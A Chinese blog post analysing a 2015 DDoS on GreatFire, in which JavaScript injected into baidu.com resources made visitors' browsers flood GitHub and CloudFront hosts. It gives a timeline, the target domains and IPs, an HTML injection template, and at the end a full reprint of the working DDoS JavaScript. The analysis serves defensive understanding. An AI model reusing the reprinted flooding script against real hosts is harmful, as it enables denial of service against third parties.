牛牛逼逼叉叉
菜单

基于JavaScript的DDoS首次通过安全的浏览器发动攻击

2015年06月13日,分类《网络安全》,作者:
博客捐助

为了防止恶意用户发布恶意内容,我们的安全分析浏览器都在虚拟机上运行。这使我们能够确定一个网页是否包含恶意内容,避免那些利用用户浏览器的JavaScript发起的攻击。我们每天会分析数以百万计的网页,通过机器学习算法选择考察的网页,大体上覆盖了所有的网络。

在三月中旬,出现几起针对审查监测机构GreatFire的拒绝服务攻击。研究人员分析了大量这种DDoS攻击,发现了它的攻击原理,它是通过网络运营商进行的,拦截良性网页的内容并注入恶意的JavaScript代码。比如将托管在baidu.com的网页分析JavaScript代码和HTML资源,替 换成包含攻击片断的JavaScript代码,这些代码会向被攻击的域名持续发送请求。

注* GreatFire 是托管在Github上面的开源项目,此次攻击的目的可能是希望这个项目从Github中移除。在中国这种劫持手法其实很常见,如有些网络运营商会偶 尔拦截某些网站并注入广告或更换下载文件链接等,这种技术可能是第一次被用来发动DDoS攻击。

在这篇博客中,我们分析了从2015年3月1日到4月15日的数据。首次发现安全浏览在baidu.com中注入攻击代码是在3月3日,2015年我们的观察到的最后一次注入攻击是在2015年4月7日。下面攻击发动的曲线图:

091319tt6nt3p6r6rz06oz

我们注意到,这次攻击分为多个阶段。第一阶段似乎是一个测试,从3月3日进行到3月6日。初始测试的目标是114.113.156.119:56789和并且请求的数目被人为限制。从3月4号到3月6日,请求限制被移除。

下一个阶段是在3月10日到13日,针对下面的IP地址进行:203.90.242.126。该IP地址的域名为sinajs.cn下的主机。 3月13日,攻击扩大到d1gztyvw1gvkdq.cloudfront.net。起初,请求都通过HTTP,然后升级到HTTPS。 3月14日,攻击都通过HTTP和HTTPS开始真正的和有针对性指向d3rkfw22xppori.cloudfront.net。直到3月17日。

3月18日,受攻击的主机增加到:
d117ucqx7my6vj.cloudfront.net,d14qqseh1jha6e.cloudfront.net,d18yee9du95yb4.cloudfront.net,d19r410x06nzy6.cloudfront.net,d1blw6ybvy6vm2.cloudfront.net

这也是我们第一次发现注射截断其中的非功能性Javascript。在此攻击过程的某个时刻,CloudFront的主机开始将请求302重定向到 greatfire.org以及其他域名。使用替换的Javascript在3月20日完全停止,但HTML页面注入还在继续。而使用 Javascript注入会破坏了原始网页的功能,HTML注入则没有。HTML被修改成包括原始内容和注入攻击Javascript代码的内容,如下所示:

  1. <html>
  2. <head>
  3. <meta name="referrer" content="never"/>
  4. <title> </title>
  5. </head>
  6. <body>
  7. <iframe src="http://pan.baidu.com/s/1i3[...]?t=Zmh4cXpXJApHIDFMcjZa" style="position:absolute; left:0; top:0; height:100%; width:100%; border:0px;" scrolling="yes"></iframe>
  8. </body>
  9. <script type="text/javascript">
  10. [... 注入攻击的JavaScript代码 ...]

通过该技术,web浏览器会获取相同的HTML页面两次,但由于查询参数t的存在,第二个请求没有进行注入。被攻击的域名也发生了变化,现在包括了:dyzem5oho3umy.cloudfront.net,d25wg9b8djob8m.cloudfront.netd28d0hakfq6b4n.cloudfront.net。

这个阶段进行了约10小时后,我们看到他们302重定向到一个不同域名的目标服务器。

注**.cloudfront.net 重定向到了 github.com

针对CloudFront的主机攻击在3月25日停止。相反,托管在github.com资源则现于被攻击状态。第一个新的目标是
github.com/greatfire/wiki/wiki/nyt/,很快就跟着github.com/greatfire/github.com/greatfire/wiki/wiki/dw/。

在3月26日,一个包含混淆攻击的Javascript代码取代了原来的版本并开始瞄准以下资源:github.com/greatfire/和 github.com/cn-nytimes/。在这里,我们也观察到一些拦截注入。对GitHub的攻击似乎在2015年4月7日停止,这是看到最后一次观测到的注入攻击。

从三月攻击开始到四月停止,我们观测到19种独特的Javascript版本(MD5)。

对于HTML注入,他们的MD5校验和内容有关系,所以我们没有提供。注入的Javascript非常类似于上面提到的那种方式。
我们的系统观测到以下八个baidu.com域名和对应的IP地址被进了注入攻击:
cbjs.baidu.com(123.125.65.120)eclick.baidu.com(123.125.115.164)hm.baidu.com(61.135.185.140)pos.baidu.com(115.239.210.141)cpro.baidu.com(115.239.211.17)bdimg.share.baidu.com(211.90.25.48)pan.baidu.com(180.149.132.99)wapbaike.baidu.com(123.125.114.15)

注入的Javascript的大小介于995到1325个字节之间。

我们希望这份报告有助于了解这种攻击的整体情况。它还表明,在目前的网络环境下,攻击者可能会借助一些安全的浏览器,任何人都将无法防范。这也表明,从背后分析这种攻击其实是很难的。

如果整个网络都通过TLS传送并加密,这样的注入攻击就不可能出现。这进一步增加了我们将网络过渡到全加密来保护完整性的动机。不幸的是,防御这种攻击对于网站经营者来说是不容易的。

注* 其中一段攻击JavaScript代码,大概内容是每2秒在html中加入一段script, url地址指向并访问 https://github.com/greatfire/ , 从代码可以分析出,其实任何被攻击的主机都无法防范(如从http发动针对https的攻击),除非整个互联网都进入https时代(如果发生劫持,安全浏览器会发出警告)

  1. document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");
  2. !window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
  3. startime = (new Date).getTime();
  4. var count = 0;
  5. function unixtime() {
  6. var a = new Date;
  7. return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
  8. }
  9. url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
  10. NUM = url_array.length;
  11. function r_send2() {
  12. var a = unixtime() % NUM;
  13. get(url_array[a])
  14. }
  15. function get(a) {
  16. var b;
  17. $.ajax({
  18. url: a,
  19. dataType: "script",
  20. timeout: 1E4,
  21. cache: !0,
  22. beforeSend: function() {
  23. requestTime = (new Date).getTime()
  24. },
  25. complete: function() {
  26. responseTime = (new Date).getTime();
  27. b = Math.floor(responseTime - requestTime);
  28. 3E5 > responseTime - startime && (r_send(b), count += 1)
  29. }
  30. })
  31. }
  32. function r_send(a) {
  33. setTimeout("r_send2()", a)
  34. }
  35. setTimeout("r_send2()", 2E3);

来源:http://ourjs.com/detail/5546e561329934463f000007



发表评论

电子邮件地址不会被公开。 必填项已用*标注

【上一篇】

如何在CentOS Linux中配置MariaDB复制

【下一篇】

两种方式创建你自己的Docker基本映像